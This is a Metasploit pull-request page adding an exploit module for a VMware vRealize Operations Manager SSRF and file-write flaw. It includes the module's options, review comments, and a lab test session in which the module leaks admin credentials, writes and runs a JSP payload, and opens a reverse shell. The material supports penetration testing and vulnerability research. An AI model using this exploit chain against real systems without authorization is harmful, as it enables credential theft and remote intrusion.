[WIP] Add VMware vRealize Operations (vROps) Manager SSRF RCE
rapid7/metasploit-framework pull request #15005
Opened 2021-04-05 20:21 UTC by wvu-r7

# WIP

```
msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > info

       Name: VMware vRealize Operations (vROps) Manager SSRF RCE
     Module: exploit/linux/http/vmware_vrops_mgr_ssrf_rce
   Platform: Linux
       Arch: java
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-03-30

Provided by:
  Egor Dimitrenko
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   vRealize Operations Manager < 8.3.0

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8443             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits CVE-2021-21975 and CVE-2021-21983.

References:
  https://cvedetails.com/cve/CVE-2021-21975/
  https://cvedetails.com/cve/CVE-2021-21983/
  https://www.vmware.com/security/advisories/VMSA-2021-0004.html
  https://twitter.com/ptswarm/status/1376961747232382976
  https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis

msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) >
```

2021-04-21 19:10 UTC, gwillcox-r7 requested changes, later dismissed
Minor two changes, but otherwise this looks really good, nice job @wvu-r7!

2021-04-21 20:27 UTC, wvu-r7 commented on modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb
> +          leak admin creds and write/execute a JSP payload.
Lol, I've been refactoring how I write module descriptions, and I casually cut that information as of this PR, since it was already reproduced in the code and docs. I'll add it back in for completeness. Thanks for swaying me! I just need to figure out how I want to word it.

2021-04-21 21:05 UTC, wvu-r7 commented on modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb
> +          leak admin creds and write/execute a JSP payload.
Aight, I'm giving this new format a go. Should be on par with my previous descriptions, too. Thanks again.

2021-04-26 18:08 UTC, gwillcox-r7 approved these changes
Marking approved, unfortunately my testing environment is refusing to run this properly. If someone can just run this via a test using the OVA, it should be a quick and easy land.

2021-04-27 14:19 UTC, space-r7 commented
Code looks good to me. Test output:

```
msf6 > use exploit/linux/http/vmware_vrops_mgr_ssrf_rce 
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > options

Module options (exploit/linux/http/vmware_vrops_mgr_ssrf_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax
                                          'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an ad
                                         dress on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8443             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   vRealize Operations Manager < 8.3.0


msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set rhost 192.168.37.131
rhost => 192.168.37.131
msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set srvhost 192.168.37.1
srvhost => 192.168.37.1
msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Starting SSRF server...
[*] Using URL: https://192.168.37.1:8443/3pCyBQ3
[*] Executing automatic check (disable AutoCheck to override)
[*] Leaking admin creds via SSRF...
[*] 192.168.37.131 connected to SSRF server!
[+] Successfully leaked admin creds
[+] The target is vulnerable.
[*] Writing JSP payload
[+] Successfully wrote JSP payload
[*] Executing JSP payload
[+] Successfully executed JSP payload
[+] Deleted /usr/lib/vmware-casa/casa-webapp/webapps/casa/sJw0Gj8HptxGP.jsp
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.131:43684) at 2021-04-27 09:11:55 -0500
[*] Server stopped.

id
uid=1000(admin) gid=1003(admin) groups=1003(admin),0(root),25(apache),28(wheel)
uname -a
Linux vRealizeClusterNode 4.19.69-1.ph3 #1-photon SMP Fri Sep 6 00:00:41 UTC 2019 x86_64 GNU/Linux
^C
Abort session 1? [y/N]  y
```

2021-04-27 14:21 UTC, merged

2021-04-27 14:26 UTC, space-r7 commented
## Release Notes

This adds a module that exploits both a pre-auth SSRF and a post-auth file write via directory traversal to get code execution as the `admin` user on vulnerable VMware vRealize Operations Manager installs.